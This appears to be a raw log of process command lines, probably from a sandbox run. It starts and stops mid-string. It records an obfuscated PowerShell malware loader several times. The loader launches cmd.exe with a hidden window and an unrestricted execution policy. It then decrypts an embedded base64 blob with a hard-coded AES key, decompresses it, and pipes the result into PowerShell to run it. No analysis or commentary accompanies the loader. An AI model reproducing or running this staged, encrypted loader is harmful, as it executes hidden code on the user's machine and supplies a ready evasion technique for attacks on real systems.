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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ITufmtMLHgVEL = 'AAAAAAAAAAAAAAAAAAAAADtnvX24mEK2hW8RbbL5X2KHm316RWatxcX3+7v4DZ/1WJXt3kVTfJMRSw/0Agv4WTgUnimICmwI1mp0XAg3wV1l/Nk/XEYdFNqy9etUj0KCfDTb9mf+9dmTWXKBqKtAB2lsN94OdJfyfwHNVl5YS8RKarUl1Fa92CUiZ50GLCwbh6h8+EZjgaGgrfnQhHaWcqL5afH+yxSykwgw3Izrd2g/ylvFlVtIKMkHCLf1+4Dcj/xQ5ogZ6x7gd8mDX36loJV53EpKf6h+YaaiNMufy/fNCnGeIREtR/cn+WGi4+4ixdaGBTiwo1Kgs7cGCgkkxZlr2cn71r0hDuQXImeUiAJmAnPDto4UJ/j+JzBmOR8MeP+aEnAxgXNZYkuwr3wjkdvGViUJBNQ5sqWDehTlvxASDUOjqVmo1Y13f5mZtAUhCbpebA95nGZbhQwnRMomhnNAMzaT11eK5942PK5bFEMQjY4VSZIAM7bocs1Ar1Jp7BkGk8KrYC5yAwWIG2DTeBIf/4HOFdNeMq7Q7cm/xdzQ2r2Ek/VpXZa0HkWNOV7zr+Gy/84f76/K8yC/ExryvPTCFuRMJOD+qeyWCTEYpsS/bLL9Ul1YIIgjoSwcjy/g0SyILOAqGlkx3/vd/Ty4K9gNxmFa+HAOS4EY2A7KRkyUxdLVqA+H0iVooSjzdnayWiArM+oMrukRZoOcwmZoHlt+4nn9HB60SXGPYMLePAwt/ZPprtnCRDidjEwkcSMxeBSWNBt8sTY/H7Jj0wM/ILKRwosFN2vrOI6SZbRjWDRbFzII3tIQ3xATLUz9u4zks9p5omogNO/y1f5BabsTnYH+m1yoX2Jber8Q64d3agsNov0p1wGN6A0FnMixd+G7JwbMZxLktrQ6PZifqI0bKrNhBnhFyUoq7wLZkD/mNidPkEJr/fsdBo2O5Eu/cOegjeWoTqwHz8pXQ/xiFcfn2t72629NwZjy5K6d8fK7zOs6w0Njj747xQp/d9HWnnpqnUOeLdXNNsEAhriP6pgziQPkG3y6SRYfa2a6RMHp7dmeEajl7H15HznbP3cTj/x9/vwQe1BnZFLgQQUGfSRhg8E1ucPuA29oU3rh5EqlfdOBFVKWWKMQCl9VEQ1pTHMXnOdrVHfY4zbj5n0c9If0mMsG2ZQfPLKYbeEjX/kyH++GJfXvjfyKJOAJqu6aNxK5XVqzgzjUCAnuZP8KdYLgsGS7TlLb+fSk/Xn/nPioV4FGgIKXJJhSNZTCVaxk9pbrF3oanii3et3L+uFov09w3An2THZTk51bsaupjHhNDnbi0YZ/uv1T2KnbRvLjUnHoaBdK7HI5NufgSm9CX0XTnifXfHdir3jNX3Pdun5yDOHm77hzqVpeOvbW3PwrB1bPSfA3R/3Xqn8TOgQonUjtmbbPnT92Lge0N7gSQM/rgWzVjZkPhLQ+3JjVLDgytJkziMMZhaCzuUg/w0He1NUVynSvkjm+6ZdvmKBZwt4zLhCAndi6OoP73GiZBq3KpUGvA7tRWDFwKGD4ljJv13CujWgL0BM5yULy6ZJ0jVuvJpALPauISoL/UCCH9BVUU1DYkCMvmwwIP278U39b41NFFpxnRyJ9ugKjsi82j7pjAT3nA9HH1diRLsmb9MzDWSMgxaKdV78OfbPMauMoA7+N2bYRd7cIvB4uFYEhldWgc1K6/aN35p8jexm6V0ju49Kjlo1Ym9jPhzgLlr8l6w1iPe7em8xpLTh1U7Wbv1Q9ayKusLDZL1OqI4YnvpHi7HXZKJytb2xPytAhixf7Hexmw6OxlPUv6a2vsi2MrRPtuWTYa7zhwahj8oK6dFToYhLSrDuPxm4Wole5Jvsd8Hvn4hUOPNLLMHb5wuVYnrZY5QEf4W73KzvQ8gl2ZS487ClvO6YOhj1b946UkRKnZGc+EyGEvJD02xtNuJBfSRtz55uBS1IniZoHHNSfRhPLDfnfnQtyFvjHYOwhQr6DT8wWGiKo02eOtRcDc6bZxY+WPhhGKvjf0km0RAM0R29ittdGYFzm24bL3wk4lK0x1RYhxLpbOrHlJlkgkzWQ3QdQ/ICxwnC8DEAv5OvUWL45UVoL92F3/X+PH/PmnAooOaltZiT97oWxsBdrvvRuusoQokRsxdGYENRgRtdMt210rIBAOXipRIxFm4yz6/1PuYG+Pyz1EHyQOB7fWuy7FG9nI432B2te02vvZ4zaMJ2pRGhXvO78aJv6wS55uib60BXrmMTS7inwUuqsv9uEM7COCed5P3ZR7FJxPG09h9EhVjzbS9fgH7Dof0OlQJ4MceKOtYvRiECtY1yUANcjb3cEeUO9bl3knilh9FDUQRwCeYL1WxoN620S7kAnOoXfx8kEeVP33XtQTt93ltkqkdnprS9Vqxf7AKjjBzZUsMrvwxWLN43/urxAY51NicDkqfOiiS5UZEksZgYkfzGePaAD3+k/FiLqoZMQTwFw+M0izxrg/nsiZbpa3i/IV6c/+NcOogB/nywwRbweIX3YEXUuHCs82tKesjo/Ot93/bGW1j7HKvyUIbOGiaCrOrB88kOJPxyoAe/u1w3Tki3SWWaJvvoAzF88w+Ybhz5prRR/BNqmFaUNEhJ3KY53Em5Uhk2dyPjCCTH1Oh3TeGg55ArY2lhgXyJNnM9PoAJhRZQ5VIsin5Ie4dXCDSG76mk0usbhheT3EV6vfxmGPEiWUzuS/xlLS87slZmjDUptCv20xfVisMQyVF7pYw/QDgUlLBdx1x1eTlSGapmqmXHaPWBOFeEjHWWv6KjE7EMfuizmJ/sxk2G1fJre1b8/ruq6jS62PR1kf50MpIMDS57WFiBpoCU9bAsjEs+S8o42Yn3FakwypIpmepYNZ8Gx9wbrtDreazE+ENDlAMIn0M1b7IUAu3ceVYF1J1kRKqsHPzuyMxkRryqzFYrJNbYrt5GQ7HBUgURx+N+9NcdaI+nYpsJRGa0RVEXBCC+GkY8l8FdeTWniE6+lae6eMGi3Nx3J8axMNWyUaOJSCQ4M7GC/kLCARNNIcgCxI1hdv+fxLPb9znvLmuUf+nTFh93BQnXAIj3/W5psGXmziMwutMKhkIHWHxFe8Wdh3o+WHnqQ2/J+MSKOrxqIrmSWcT7WR0WUgDoXse8PNAvGAcmYKNSuG9GtCmgbe/qAD9eCy0u8cn+VOYBfM3TOrpB5HHsmF+MDN3qC2FRETDgUQ+h4LQAgzA/HqF/yjd/u7NiZj9HdsOlhFxrlYCucRpsx0PAQ8E1AFPDxdLWaki8BJGLHEaCIO7Q82uthpaz73zTrbIinNzqIaVv/06tuvjf5wMT72e+ebc+Ie3LQks4EVUAqJMucMMb6wCrqf06Q5czWh8SPhK9I8BH0BeeNjH3iHr2pnFvbbk4ZgWPcAfsOFpLH792L8dwJWmbpCcMC3x/qsy/IZf3/tXVSco1fZJ0bunZV1g0jqmyolR1w+n19WET8ruQmose7Nhu9l7asYHY7i5EEOQik1D+1Zz8ayZt6M20Brr8FYQc3PEHO/WDxuduF+WsnAUUNke1c0/Sc5Z5Q0PACvwwxvA738cL3AfIDeB0+E7sOMlk8llo1Sq86TXqtjBskU2gxzvbAcoq4VLUldV1yaZ5RxE7s8PnuxlU/BrRQZjUoQXKVpVvA45zvP3U61F6S9yIxyyJ1dRgd6xA2/dS1IzNVEXN7xULbuhLDf0dsgljZFVHUEuyV73vy74nrUY/4Sqn+39WN/2mqpyTEFn/Kgcgs+JZWOQKJB/IfDOPi3C7iNfR+d4WXAgdnn55N+LoWH+tub+Ad9cHn4fqRoJ6JqFB9x74HViFsT8JDleAzd72SqqutK41lQ2Bl4i0vWwQEMGTf0/QpQHyi3Vx0lqkZ+1GRJDclaKlYkaSn6RRZJpGG3yzyBWO2T4b2Xj2gmhcyL7tlTEEBINASiXC+HwTXV8tNsTyLDXA3wsTC/feEs3C6msAsZfuPdnFT9rd8a+bMj44r0ybHsgREON/jTX8pfinacU7B6ku8gbVZEB9PwUMCqJ+iaj0ByMOlo7wlZkC9bKrlaWE2zrRwiE5zOOZnwCXHChEhwzueik13nwZlEHrwjhQQiaq36qGblU5aPgspHD0zjiaX7jcHt54iPiF2jT8D1g5WB5JQjU/9wSBrDvD4uzuEPMeQb5zDbq266ptjitL2YHDqCpdmvhaeTQZMJe2YG3/j';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - }
cmdline powershell -
cmdline C:\Windows\System32\cmd.exe /c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell -
cmdline "C:\Windows\system32\cmd.exe" /c powershell.exe $ITufmtMLHgVEL = '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